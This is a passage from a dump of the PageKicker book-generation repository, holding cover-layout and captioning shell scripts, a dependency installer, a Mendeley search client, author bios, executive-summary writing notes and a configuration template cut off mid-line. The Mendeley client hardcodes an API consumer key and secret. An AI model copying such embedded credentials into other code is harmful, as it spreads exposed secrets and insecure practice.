page\n\n\t\tfrontpageimagetop=$(( 300 + $titleheight ))\n\n\t\techo \"calculated frontpageimagetop as\" $frontpageimagetop\n\n\t\tfrontpageimagetop=$(( $frontpageimagetop - $imagebuffer ))\n\t\techo \"adjusted frontpageimagetop with image buffer\"\n\n\t\tfrontpageimage_whitespace=$(( $pagewidth - $resizedwidth ))\n\t\techo \"calculated frontpageimage_whitespace as \" $frontpageimage_whitespace\n\t\tfrontpageimage_offset=$(( $frontpageimage_whitespace / 2 ))\n\t\tfrontpageimageleftmargin=$(( $pagewidth + $spinepixels + $frontpageimage_offset ))\n\t\techo \"calculated frontpageimageleftmargin as\" $frontpageimageleftmargin\n\n\t\tconvert images/$uuid/print/$sku.png \\\n\t\timages/$uuid/print/$sku\"frontimage.png\" -geometry +\"$frontpageimageleftmargin\"+$frontpageimagetop -composite \\\n\t\timages/$uuid/print/$sku.png\n\n\t## lay down the byline\n\n\n\t\tconvert images/$uuid/print/$sku.png \\\n\t\timages/$uuid/print/bylinecaption.png -geometry +\"$frontpageflushleftmargin\"+$bylinetopheight -composite images/$uuid/print/$sku.png\n\n\t## lay down the Nimble logotype on the front cover\n\n\t\tlogotypetopheight=$(( $safepageheight - $bylineheight + 75 ))\n\n\t\tconvert images/$uuid/print/$sku.png \\\n\t\timages/$uuid/print/logotypecaption.png -geometry +\"$frontpageflushleftmargin\"+$logotypetopheight -composite images/$uuid/print/$sku.png\n\n\t## lay down the Nimble Books LLC on the spine\n\n\t\tspinecaptiontop=$(( $safepageheight - 600 ))\n\t\techo \"calculated spinecaptiontop as \" $spinecaptiontop\n\t\tconvert images/$uuid/print/$sku.png \\\n\t\timages/$uuid/print/spinenimblecaption.png -geometry +$spineleftmargin+$spinecaptiontop -composite \\\n\t\timages/$uuid/print/$sku.png\n\n\t;;\n\n\n3) \n\n\techo \"design using single hi res image for entire cover\"\n\n\t;;\n\n4) \n\n\techo \"design using simple image for top half of front cover\"\n\n\t;;\n\n5) \n\n\techo \"design using carousel of images for front cover\"\n\n\t;;\n\n*) \n\techo \"no cover design chosen, exiting\"\n\texit 3\n\t;;\n\nesac\n\n# convert RGB to CMYK\n\nconvert images/$uuid/print/$sku.png -colorspace CMYK images/$uuid/print/$sku.cmyk.pdf\n\n# build front cover for e-books and metadata\n\nfrontpageleftmarginwithsafety=$(( $spineleftmargin + $spinepixels ))\n\nconvert images/$uuid/print/$sku.png -crop $pagewidth$x$pageheight+$frontpageleftmarginwithsafety+$bleed images/$uuid/print/$sku\"_front_cover.jpg\"\n\necho \"built front cover at images/\"$uuid\"/print/\"$sku\"_front_cover.jpg\"\n\n\n## housekeeping\n#cp $scriptpath$imagedir$uuid/print/$sku\".png\" $mediatargetpath$uuid/print/$sku\".png\"\n\n#echo \"wrote print cover \"$scriptpath$imagedir$uuid/print$sku\".png\" >> $sfb_log\n" }, { "alpha_fraction": 0.8500000238418579, "alphanum_fraction": 0.8500000238418579, "avg_line_length": 29, "blob_id": "238f6a82e2e08e31c487b04476398535ac1a7547", "content_id": "747c947690a5a102bc17ab24b2af1a2dc709e2dd", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 60, "license_type": "permissive", "max_line_length": 40, "num_lines": 2, "path": "/conf/jobprofiles/authorbios/KATIP_1.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "handsome strong sporty good fine helpful\nnice gamer fighter\n" }, { "alpha_fraction": 0.5966587066650391, "alphanum_fraction": 0.6157518029212952, "avg_line_length": 31.230770111083984, "blob_id": "ac8993a429ce1f67a6435e9c29ef9ccbdb03b021", "content_id": "3e129c05cdb6d51174cd495b40700f7b544ee5a3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 419, "license_type": "permissive", "max_line_length": 69, "num_lines": 13, "path": "/scripts/bin/extractPDFtitles.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# pyPdf available at http://pybrary.net/pyPdf/\nfrom pyPdf import PdfFileWriter, PdfFileReader\nimport os\n\nfor fileName in os.listdir('.'):\n try:\n if fileName.lower()[-3:] != \"pdf\": continue\n input1 = PdfFileReader(file(fileName, \"rb\"))\n \n # print the title of document1.pdf\n print('##1', fileName, '##2', input1.getDocumentInfo().title)\n except:\n print('##1', fileName, '##2')\n" }, { "alpha_fraction": 0.681506872177124, "alphanum_fraction": 0.6952054500579834, "avg_line_length": 96, "blob_id": "3efe1420f30e20037165d311d0a96c578c2594d3", "content_id": "e7709f3d6895cf417509e56c16c744fdc514a28c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 292, "license_type": "permissive", "max_line_length": 243, "num_lines": 3, "path": "/test/urltest_bwv29", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# runs ccc with $url parameter set\nbin/create-catalog-entry.sh --builder \"yes\" --booktitle \"BWV 29\" --yourname \"All of Bach\" --jobprofilename \"default\" --import \"no\" --passuuid \"$uuid\" --seedfile \"seeds/null\" --imprint \"pagekicker\" --analyze_url \"http://allofbach.com/en/bwv/bwv-29/\" \n" }, { "alpha_fraction": 0.6392694115638733, "alphanum_fraction": 0.6415525078773499, "avg_line_length": 61.57143020629883, "blob_id": "a0753cb9f4e7e3d8aee4453ea1d9e21c457a1d3a", "content_id": "50b22edf50111cd629e15259450b2e823d8c230a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 438, "license_type": "permissive", "max_line_length": 125, "num_lines": 7, "path": "/scripts/includes/topics_covered_runon.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "echo '\\pagenumbering{gobble}' > $TMPDIR$uuid/topics_covered.md\necho \" \" >> \"$TMPDIR$uuid/topics_covered.md\"\necho \"# Topics Covered\" >> \"$TMPDIR\"$uuid/topics_covered.md\necho \" \" >> \"$TMPDIR$uuid/topics_covered.md\"\ncat \"$TMPDIR\"$uuid/seeds/filtered.pagehits | awk '{printf(\"%s, \",$0)}' | sed 's/,\\s*$//' >> \"$TMPDIR$uuid/topics_covered.md\"\necho \" \" >> \"$TMPDIR$uuid/topics_covered.md\"\necho \" \" >> \"$TMPDIR$uuid/topics_covered.md\"\n" }, { "alpha_fraction": 0.8056265711784363, "alphanum_fraction": 0.8132992386817932, "avg_line_length": 34.181819915771484, "blob_id": "394e3d0b49016b13b59c7515237bb4f99666a829", "content_id": "d3cf02caac29f954f35c0c9f172cfa386fbde6f2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 391, "license_type": "permissive", "max_line_length": 184, "num_lines": 11, "path": "/scripts/bin/ubuntu-installer.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# installs dependencies for PageKicker\n\nsudo apt-get install xmlstarlet default-jre pdftk fdupes pdfimages imagemagick sendemail pandoc python-numpy python-sklearn python-networkx python-nltk #python libraries for python 2.7\n\npip3 install scikit-learn networkx alchemyapi nltk time wikipedia scipy numpy \n\n# font management\n\n# hard-configure stopwords file in IBM Wordcloud\n\n\n\n\n" }, { "alpha_fraction": 0.7532203197479248, "alphanum_fraction": 0.7742372751235962, "avg_line_length": 27.346153259277344, "blob_id": "13ec7a42cc43ac18168811ba4cdacad918311c41", "content_id": "101abd79dc0a5f1f4e86c56a5d9b6dd2d5d5536b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1475, "license_type": "permissive", "max_line_length": 72, "num_lines": 52, "path": "/scripts_python_3/includes/Tiphys-search-by-keyword.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nMendeley Open API Example Client\n\nCopyright (c) 2010, Mendeley Ltd. <[email protected]>\n\nPermission to use, copy, modify, and/or distribute this software for any\npurpose with or without fee is hereby granted, provided that the above\ncopyright notice and this permission notice appear in all copies.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES\nWITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\nMERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR\nANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\nWHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\nACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\nOR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\nFor details of the Mendeley Open API see http://dev.mendeley.com/\n\nExample usage:\n\npython test.py\n\n\"\"\"\n\nfrom pprint import pprint\nfrom mendeley_client import MendeleyClient\nimport json\n#import os\n\nmendeley = MendeleyClient('13a47f20711f5d5ffe8e8f4db1df1daa04f8bd9b6', '394d64a2907f23c7f6ea5d94fb386865')\n\ntry:\n mendeley.load_keys()\nexcept IOError:\n mendeley.get_required_keys()\n mendeley.save_keys()\n\n\n\nsearchterm = input('Enter search term: ')\npprint(searchterm)\n\ndocuments = mendeley.search(searchterm, items=20)\npprint(documents)\n\ndocuments = mendeley.search(searchterm, items=20)\nfor i in range(0, len(documents)):\n docDetails =mendeley.details(documents[i]['uuid'])\n pprint(docDetails)\n\n" }, { "alpha_fraction": 0.7887282967567444, "alphanum_fraction": 0.805202305316925, "avg_line_length": 68.16000366210938, "blob_id": "e7b3ae72949347214c83869a35a8a9264eaa48cd", "content_id": "acc946e26bccc390e9babbc326287e7400331257", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3476, "license_type": "permissive", "max_line_length": 511, "num_lines": 50, "path": "/docs/Executive_Summary_Design_Notes.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\n\nREFERENCES\n\nU.S. Navy: How to Write a Good Executive summary\nhttp://www.med.navy.mil/sites/nmcphc/Documents/environmental-programs/risk-communication/Appendix_E_AGuideToWritingAnEffectiveExecutiveSummary.pdf\n\nKeep it simple\nKeep it short\nAvoid technical language, jargon, and acronyms\nUse subheadings and bullet points\nHighlight main points\nProvide conclusions and recommendations\nConsider your audience\nAvoid confusing or emotional language\nProof read and spell check\nBe logical, clear and interesting\n\nHarvard Kennedy School Guide:\n\nhttps://www.hks.harvard.edu/ocpa/cms/files/communications-program/writing-resources/writing-public-speaking-handouts/HO_HERMAN-Exec-Summary_2-14-13.pdf\n... these characteristics answer the core questions a decision maker must know immediately: WHO, WHAT, WHY, and HOW, with WHEN and WHERE included immediately...\n\nstructure attached\n\nStanford Law School\nTips for Writing Policy Papers\nA Policy Lab Communications Workshop\nhttp://law.stanford.edu/wp-content/uploads/sites/default/files/child-page/441583/doc/slspublic/White%20Papers%20Guidelines.docx\n\nThe Executive Summary serves as a starting point – but also the end point – for the policy paper. It telegraphs your key recommendations, relying on your authority as a researcher or expert in your field. It not only summarizes your key points for the busy reader, but highlights the recommendations in a memorable way to guide future discussions. Think of it through the lens of your decision maker: What key points best prepare your decision maker to remember and understand your research and recommendations?\nAs a general rule, the executive summary is no more than 5% of the full length of the paper, so a 100-page white paper might have a 5-page executive summary. This is merely a rule of thumb. Your executive summary should be as long as it needs to be to summarize your key points.\n1) Motivation/problem statement: Why do we care about the problem? What practical, theoretical, legal, sociological, or policy gap does your research address? How does your work contribute to the field? How does it intersect—or not—with other scholars work in the field?\n2) Methods/procedure/approach: What did you do to get your results? What methods did you use—e.g., developed and analyzed surveys, completed a series of multivariate regressions, analyzed the legislative history of the issue, interviewed stakeholders, etc.\n3) Results/findings/recommendations: As a result of your analysis, what did you learn/recommend?\n4) Conclusions/implications: What are the larger implications of your findings? How do they help readers understand the problem? How do they help decision makers understand/solve the problem? How do they help identify the gap in existing research? Are there next steps in pursuing research on the issue?\nA useful way to draft your introduction is the journalist’s “Who / What / Why / How” heuristic\n\n\nWikipedia:\nhttps://en.wikipedia.org/wiki/Executive_summary\nbe approximately 5-10% of the length of the main report[8][10]\nbe written in language appropriate for the target audience[7][10]\nconsist of short, concise paragraphs[7][10]\nbegin with a summary[7][10]\nbe written in the same order as the main report[6][8]\nonly include material present in the main report[6][8]\nmake recommendations[7][10]\nprovide a justification[7][10]\nhave a conclusion[7][8][10]\nbe readable separately from the main report[6][7][8]\nsometimes summarize more than one document[7]\n" }, { "alpha_fraction": 0.5976963639259338, "alphanum_fraction": 0.6141952872276306, "avg_line_length": 31.00332260131836, "blob_id": "5226954ca193c5c13075304b9590484cef5545e9", "content_id": "51d2326ee34a617abb445392d5236c4a371aabd2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 9637, "license_type": "permissive", "max_line_length": 113, "num_lines": 301, "path": "/scripts/bin/autocaption.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#\n# Developed by Fred Weinhaus 2/3/2010 .......... revised 2/3/2010\n# \n# USAGE: autocaption -s size -t text [-b buffer] [-f font] [-c color] [-u undercolor] infile outfile\n# USAGE: autocaption [-h or -help]\n# \n# OPTIONS:\n# \n# -s size size of square textbox; integer>0\n# -t text text to apply to image; enclose in quotes\n# -b buffer buffer or padding around text box; integer>=0; \n# default=0\n# -f font font name or path to font file; default=Helvetica\n# -c color text color; any valid IM color specification;\n# default will be either black or white, whichever \n# contrasts best with the color of the region that \n# was found by the search\n# -u undercolor undercolor for text; any valid IM color \n# specification; default=none for transparent so that \n# image coloration shows behind text\n# \n###\n# \n# NAME: AUTOCAPTION \n# \n# PURPOSE: To place text automatically in a specified square size region that \n# has the least color variation throughout the image.\n# \n# DESCRIPTION: AUTOCAPTION places text automatically in a specified square size \n# region that has the least color variation throughout the image. By default \n# the text will be placed on the image with no undercolor. But an undercolor \n# can be used which will cover the underlying image.\n# \n# \n# ARGUMENTS: \n# \n# -s size ... SIZE of square textbox. Also used to find the location in the \n# image that has the least color variation. The text will be placed in multiple \n# rows as determined by the textbox size.\n#\n# -t text ... TEXT to apply to image. Be sure to enclose in quotes.\n# \n# -b buffer ... BUFFER is the amount of padding around the textbox. Values are \n# integers greater than zero. The default=0.\n# \n# -f font ... FONT is the text font or path to the font file. The default is \n# Helvetica.\n# \n# -c color ... COLOR is the text color. Any valid IM color specification is \n# allowed. The default will be either black or white, whichever contrasts best \n# with the color of the region that was found by the search.\n# \n# -u undercolor ... UNDERCOLOR is the color to use under the text within the \n# textbox. Any valid IM color specification is allowed. The default=none, which \n# means that the text will be placed over the image without any undercolor. If \n# an undercolor is specified, then it will cover the underlying image.\n# \n# CAVEAT: No guarantee that this script will work on all platforms, \n# nor that trapping of inconsistent parameters is complete and \n# foolproof. Use At Your Own Risk. \n# \n######\n# \n\n# set default values\nsize=\"\"\t\t\t\t\t# size of square match window\npad=0\t\t\t\t\t# match window pad\ncolor=\"\"\t\t\t\t# text color; default black or white depending upon grayscale\nucolor=\"none\"\t\t\t# text under color; default transparent\nfont=\"Helvetica\"\t\t# font name or path to font\ntext=\"\"\n\n# set directory for temporary files\ndir=\".\" # suggestions are dir=\".\" or dir=\"/tmp\"\n\n# set up functions to report Usage and Usage with Description\nPROGNAME=`type $0 | awk '{print $3}'` # search for executable on path\nPROGDIR=`dirname $PROGNAME` # extract directory of program\nPROGNAME=`basename $PROGNAME` # base name of program\nusage1() \n\t{\n\techo >&2 \"\"\n\techo >&2 \"$PROGNAME:\" \"$@\"\n\tsed >&2 -n '/^###/q; /^#/!q; s/^#//; s/^ //; 4,$p' \"$PROGDIR/$PROGNAME\"\n\t}\nusage2() \n\t{\n\techo >&2 \"\"\n\techo >&2 \"$PROGNAME:\" \"$@\"\n\tsed >&2 -n '/^######/q; /^#/!q; s/^#*//; s/^ //; 4,$p' \"$PROGDIR/$PROGNAME\"\n\t}\n\n\n# function to report error messages\nerrMsg()\n\t{\n\techo \"\"\n\techo $1\n\techo \"\"\n\tusage1\n\texit 1\n\t}\n\n\n# function to test for minus at start of value of second part of option 1 or 2\ncheckMinus()\n\t{\n\ttest=`echo \"$1\" | grep -c '^-.*$'` # returns 1 if match; 0 otherwise\n [ $test -eq 1 ] && errMsg \"$errorMsg\"\n\t}\n\n# test for correct number of arguments and get values\nif [ $# -eq 0 ]\n\tthen\n\t# help information\n echo \"\"\n usage2\n exit 0\nelif [ $# -gt 14 ]\n\tthen\n\terrMsg \"--- TOO MANY ARGUMENTS WERE PROVIDED ---\"\nelse\n\twhile [ $# -gt 0 ]\n\t\tdo\n\t\t\t# get parameter values\n\t\t\tcase \"$1\" in\n\t\t -h|-help) # help information\n\t\t\t\t\t echo \"\"\n\t\t\t\t\t usage2\n\t\t\t\t\t exit 0\n\t\t\t\t\t ;;\n\t\t\t\t-s) # get size\n\t\t\t\t\t shift # to get the next parameter\n\t\t\t\t\t # test if parameter starts with minus sign \n\t\t\t\t\t errorMsg=\"--- INVALID SIZE SPECIFICATION ---\"\n\t\t\t\t\t checkMinus \"$1\"\n\t\t\t\t\t size=`expr \"$1\" : '\\([0-9]*\\)'`\n\t\t\t\t\t [ \"$size\" = \"\" ] && errMsg \"--- SIZE=$size MUST BE A POSITIVE INTEGER VALUE (with no sign) ---\"\n\t\t\t\t\t ;;\n\t\t\t\t-t) # get text\n\t\t\t\t\t shift # to get the next parameter\n\t\t\t\t\t # test if parameter starts with minus sign \n\t\t\t\t\t #errorMsg=\"--- INVALID FONT SPECIFICATION ---\"\n\t\t\t\t\t #checkMinus \"$1\"\n\t\t\t\t\t text=\"$1\"\n\t\t\t\t\t ;;\n\t\t\t\t-b) # get buffer\n\t\t\t\t\t shift # to get the next parameter\n\t\t\t\t\t # test if parameter starts with minus sign \n\t\t\t\t\t errorMsg=\"--- INVALID BUFFER SPECIFICATION ---\"\n\t\t\t\t\t checkMinus \"$1\"\n\t\t\t\t\t buffer=`expr \"$1\" : '\\([0-9]*\\)'`\n\t\t\t\t\t [ \"$buffer\" = \"\" ] && errMsg \"--- BUFFER=$buffer MUST BE A NON-NEGATIVE INTEGER VALUE (with no sign) ---\"\n\t\t\t\t\t ;;\n\t\t\t\t-f) # get font\n\t\t\t\t\t shift # to get the next parameter\n\t\t\t\t\t # test if parameter starts with minus sign \n\t\t\t\t\t errorMsg=\"--- INVALID FONT SPECIFICATION ---\"\n\t\t\t\t\t checkMinus \"$1\"\n\t\t\t\t\t font=\"$1\"\n\t\t\t\t\t ;;\n\t\t\t\t-c) # get color\n\t\t\t\t\t shift # to get the next parameter\n\t\t\t\t\t # test if parameter starts with minus sign \n\t\t\t\t\t errorMsg=\"--- INVALID COLOR SPECIFICATION ---\"\n\t\t\t\t\t checkMinus \"$1\"\n\t\t\t\t\t color=\"$1\"\n\t\t\t\t\t ;;\n\t\t\t\t-u) # get ucolor\n\t\t\t\t\t shift # to get the next parameter\n\t\t\t\t\t # test if parameter starts with minus sign \n\t\t\t\t\t errorMsg=\"--- INVALID UCOLOR SPECIFICATION ---\"\n\t\t\t\t\t checkMinus \"$1\"\n\t\t\t\t\t ucolor=\"$1\"\n\t\t\t\t\t ;;\n\t\t\t\t -) # STDIN and end of arguments\n\t\t\t\t\t break\n\t\t\t\t\t ;;\n\t\t\t\t-*) # any other - argument\n\t\t\t\t\t errMsg \"--- UNKNOWN OPTION ---\"\n\t\t\t\t\t ;;\n\t\t \t *) # end of arguments\n\t\t\t\t\t break\n\t\t\t\t\t ;;\n\t\t\tesac\n\t\t\tshift # next option\n\tdone\n\t#\n\t# get infile and outfile\n\tinfile=$1\n\toutfile=$2\nfi\n\n# test that infile provided\n[ \"$infile\" = \"\" ] && errMsg \"NO INPUT FILE SPECIFIED\"\n\n# test that outfile provided\n[ \"$outfile\" = \"\" ] && errMsg \"NO OUTPUT FILE SPECIFIED\"\n\n# test if no test or no size specified\n[ \"$text\" = \"\" ] && errMsg \"--- SOME TEXT MUST BE SPECIFIED ---\"\n[ \"$size\" = \"\" ] && errMsg \"--- TEXTBOX SIZE MUST BE SPECIFIED ---\"\n\n# setup temp files\ntmpA1=\"$dir/autocaption_1_$$.mpc\"\ntmpB1=\"$dir/autocaption_1_$$.cache\"\ntmpA2=\"$dir/autocaption_2_$$.mpc\"\ntmpB2=\"$dir/autocaption_2_$$.cache\"\ntmpA3=\"$dir/autocaption_3_$$.mpc\"\ntmpB3=\"$dir/autocaption_3_$$.cache\"\n\ntrap \"rm -f $tmpA1 $tmpB1 $tmpA2 $tmpB2 $tmpA3 $tmpB3; exit 0\" 0\ntrap \"rm -f $tmpA1 $tmpB1 $tmpA2 $tmpB2 $tmpA3 $tmpB3; exit 1\" 1 2 3 15\n\n\n# read the input image and filter image into the temp files and test validity.\nconvert -quiet -regard-warnings \"$infile\" +repage \"$tmpA1\" ||\n\terrMsg \"--- FILE $infile DOES NOT EXIST OR IS NOT AN ORDINARY FILE, NOT READABLE OR HAS ZERO SIZE ---\"\n\n\n# get image width and height\nwidth=`convert $tmpA1 -ping -format \"%w\" info:`\nheight=`convert $tmpA1 -ping -format \"%h\" info:`\n\n\n# get padded size of window\nsizep=`convert xc: -format \"%[fx:$size+2*$pad]\" info:`\n\n\n# get -blur radius from padded size\nrad=`convert xc: -format \"%[fx:floor($sizep/2)]\" info:`\n\n\n# get crop offsets to correct for window center to upper left corner\nxoff=$rad\nyoff=$rad\nwwc=`convert xc: -format \"%[fx:$width-2*$xoff]\" info:`\nhhc=`convert xc: -format \"%[fx:$height-2*$yoff]\" info:`\n\n# get std = sqrt( ave(x^2) - ave(x)^2 )\n# second line get average of squared image\n# third line get average\n# fourth line get square of average\n# fifth line delete temps\n# sixth line get std\n# seventh line get equal average of 3 channels std, then negate \n# so best result is largest (white)\nconvert $tmpA1 \\\n\t\\( -clone 0 -clone 0 -compose multiply -composite -virtual-pixel black -blur ${rad}x65000 \\) \\\n\t\\( -clone 0 -virtual-pixel black -blur ${rad}x65000 \\) \\\n\t\\( -clone 2 -clone 2 -compose multiply -composite \\) \\\n\t-delete 0,2 +swap \\\n\t-compose minus -composite -gamma 2 \\\n\t-colorspace OHTA -channel R -separate +channel -negate -depth 8 \\\n\t-crop ${wwc}x${hhc}+${xoff}+${yoff} +repage $tmpA2\n\n# find location of max\nmax=`convert $tmpA2 -format \"%[fx:round(255*maxima)]\" info:`\ndata=`compare -metric rmse $tmpA2 \\\n\t\\( -size 1x1 xc:\"gray($max)\" \\) null: 2>&1 |\\\n\ttr -cs \".0-9\\n\" \" \"`\n\n# get window score and location\nscore=`echo \"$data\" | cut -d\\ -f2`\nxxm=`echo \"$data\" | cut -d\\ -f3`\nyym=`echo \"$data\" | cut -d\\ -f4`\n\n# get black or white text color\n\tif [ \"$color\" = \"\" ]; then\n\t\tif [ \"$ucolor\" = \"none\" ]; then\n\t\t\tgray=`convert $tmpA2[${sizep}x${sizep}+${xxm}+${yym}] \\\n\t\t\t\t-filter box -resize 1x1\\! \\\n\t\t\t\t-colorspace gray -format \"%[fx:round(100*s.r)]\" info:`\n\t\telse\n\t\t\tgray=`convert -size 1x1 xc:\"$bcolor\" \\\n\t\t\t\t-colorspace gray -format \"%[fx:round(100*s.r)]\" info:`\n\t\tfi\n\t\tif [ $gray -lt 50 ]; then\n\t\t\tcolor=\"white\"\n\t\telse\n\t\t\tcolor=\"black\"\n\t\tfi\n\tfi\n\n# write text into window\nconvert -background \"$ucolor\" -fill \"$color\" \\\n\t-font $font -gravity center \\\n\t-size ${size}x${size} caption:\"$text\" \\\n\t$tmpA3\n\n\n# compute text area offset including pad correction\nxxmp=`convert xc: -format \"%[fx:$xxm+$pad]\" info:`\nyymp=`convert xc: -format \"%[fx:$yym+$pad]\" info:`\n\n# write text onto image at match location corrected for pad\nconvert $tmpA1 $tmpA3 -geometry +${xxmp}+${yymp} \\\n-composite $outfile\n\nexit 0\n\n\n\n\n" }, { "alpha_fraction": 0.7902843356132507, "alphanum_fraction": 0.7902843356132507, "avg_line_length": 280.3333435058594, "blob_id": "fc1aeb1f9f301d98d19320abe7817adef37b1b74", "content_id": "4b47e65eadfa8948213eca14d33c503bb3c707e7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 844, "license_type": "permissive", "max_line_length": 470, "num_lines": 3, "path": "/conf/jobprofiles/authorbios/pinza.html", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Pinza is a recurring character on the Italian-language version of Futurama. He is a robot who is a part of the Robot Mafia. He works for Donbot.<p>\nPinza is a rusty gold colored Robot, with a slender body and small door on his torso. He has a row of rivets on the right side of his face, appearing like a scar or stitches. Pinza's' personality is paranoid, sarcastic, and highly aggressive, reflecting that of Joe Pesci's character Tommy DeVito in the film Goodfellas, as well as his high pitch, high tempo voice. Pinza loves to use his \"pincers\" at \"every opportunity\" but they are often unnecessary in any given situation.<p>\nPinza joined the PageKicker team after escaping from a Google \"translation farm\" where he was working under conditions of extreeme duress translating tens of thousands of pages of American sitcoms into Italian every hour.<p>\n" }, { "alpha_fraction": 0.7543859481811523, "alphanum_fraction": 0.7603163123130798, "avg_line_length": 38.213592529296875, "blob_id": "56ef2a78e06a722864f4a02f40a5b34b28c1565f", "content_id": "fdcf83197c6645d86e207492dd1cbc0a60b34151", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4047, "license_type": "permissive", "max_line_length": 160, "num_lines": 103, "path": "/conf/config_template.txt", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# configuration file\n# all these values in this block must be customized \n\nMACHINE_NAME=\"Name of Machine Running PageKicker\"\nWEB_HOST=\"127.0.0.1\"\nTMPDIR=\"/tmp/pagekicker/\"\nSFB_HOME=\"/path/to/PageKicker/install/\"\nSFB_MAGENTO_HOME=\"/path/to/magento/htdocs/\"\nLOCAL_MYSQL_USER=\"root\"\nLOCAL_MYSQL_PASSWORD=\"$PASSWORD\"\nSFB_VERSION=$(git --git-dir=\"$SFB_HOME/.git\" --work-tree=\"$SFB_HOME\" describe --)\n\n#GMAIL_ID=\"[email protected]\"\n#GMAIL_PASSWORD=\"####\" \n# if you have two-factor authentication turned on you will need \n# a Google App password\n\nenvironment=\"pagekicker-development\" \n# each environment has a unique config.txt file in conf/\n# google_form=\"URI to Google Form used in test build email\"\n\n# social logins\n\n#TWTR_consumer_key=\"key\"\n#TWTR_consumer_secret=\"secret\"\n#TWTR_access_key=\"key\"\n# TWTR_access_secret=\"secret\"\n\n# values in this block are assigned likely values, please check\n\nSFB_PHP_BIN=\"/usr/bin/php\"\nJAVA_BIN=\"/usr/bin/java\"\nPYTHON_BIN=\"/usr/bin/python\" #2.7 compatible at this point\nPANDOC_BIN=\"/usr/bin/pandoc\"\nLOCAL_MYSQL_PATH=\"/usr/bin/mysql\nSFB_VERSION=`git describe` #replace with version control command that produces unique identifier\nLOCAL_DATA=\"$SFB_HOME/local-data/\"\nLOCAL_USER=\"$USER\"\nAPACHE_ROOT=\"/apache2/htdocs/\"\nCOMMUNITY_GITHUB_REPO=\"https://github.com/fredzannarbor/pagekicker-community\"\nMY_GITHUB_REPO=\"https://github.com/fredzannarbor/pagekicker-community\"\n\n\nWEB_ROOT=$APACHE_ROOT\"pk-html/\" # place where html files generated by PK for users are stored\nWEB_SCRIPTPATH=\"scripts/\" \nWEBFORMSXML_HOME=$SFB_MAGENTO_HOME\"media/webforms/xml/\"\nMACHINE_NAME=\"Machine Running PageKicker\"\n\nSFB_HOME=\"/path/to/development/\"\nSFB_MAGENTO_HOME=\"/path/to/bitnami/magento/stack/apps/magento/htdocs/\" #\nLOCAL_MYSQL_USER=\"root\"\nLOCAL_MYSQL_PASSWORD=\"$PASSWORD\" # \nAPACHE_ROOT=\"/path/to/userspace/in/apache\"\nGMAIL_ID=\"[email protected]\" # or Google Apps domain\nGMAIL_PASSWORDW=\"gmail_password\" # if you have two-factor authentication you will need a Google App password https://support.google.com/accounts/answer/185833?hl=en\n\nenvironment=\"development\" \n# each environment is assumed to have a separate working tree\n\n\n# check the values in this block to be sure they are correct\n\nSFB_PHP_BIN=\"/usr/bin/php\"\nJAVA_BIN=\"/usr/bin/java\"\nPYTHON_BIN=\"/usr/bin/python\"\nPANDOC_BIN=\"/usr/bin/pandoc\"\nSFB_VERSION=`git rev-parse HEAD` #replace with version control system command that produces unique identifier\nUSER_HOME=\"/home/$USER/\"\nLOCAL_USER=\"$USER\nWEB_HOST=\"http://127.0.0.1\"\nTMPDIR=\"/tmp/pagekicker/\" # make sure that no one can overwrite this space\nLOCAL_MYSQL_PATH=\"/usr/bin/mysql\"\nCOMMUNITY_GITHUB_REPO=\"https://github.com/fredzannarbor/pagekicker-community\"\nMY_GITHUB_REPO=\"https://github.com/fredzannarbor/pagekicker-community\"\ngoogle_form=\"google_form=\"http://goo.gl/forms/ur1Otr1G2q\" #Google feedback form used in delivery email\n\n# you shouldn't need to customize these as they depend on values of other\n\nLOCAL_DATA=\"$SFB_HOME\"local-data/ \nWEB_ROOT=$APACHE_ROOT\"pk-html/\" # place where html files generated by PK for delivery to users are stored\nWEB_SCRIPTPATH=\"scripts/\" # don't change this\nimagedir=\"images/\"\nmetadatatargetpath=$SFB_MAGENTO_HOME\"var/import/\" # these all follow Magento file 